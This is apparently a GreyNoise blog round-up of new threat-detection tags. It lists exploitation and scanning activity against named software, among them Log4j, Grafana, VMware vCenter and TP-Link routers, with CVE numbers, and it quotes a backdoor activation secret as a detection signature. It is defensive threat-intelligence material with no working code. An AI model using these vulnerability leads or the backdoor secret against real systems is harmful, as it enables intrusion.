GreyNoise Tag Round Up | January 2022

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self Explanatory.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

Relatively new technology. It's interesting because “why would you scan the internet for that?” and there's no clear motive - that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

Critical vulnerability in MS Windows’ http.sys kernel module.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely popular server management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we have last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:

See it on GreyNoise Viz

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances. References:

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution in Apache Druid v0.20.0 and earlier References:

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier, CVE-2021-45046 affects versions 2.15.0 and earlier. References:

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel which can lead to elevated privileges and remote code execution. References:

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, an unintentionally allowed master token access which can lead to remote code execution. References:

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server side request forgery vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:

See it on GreyNoise Viz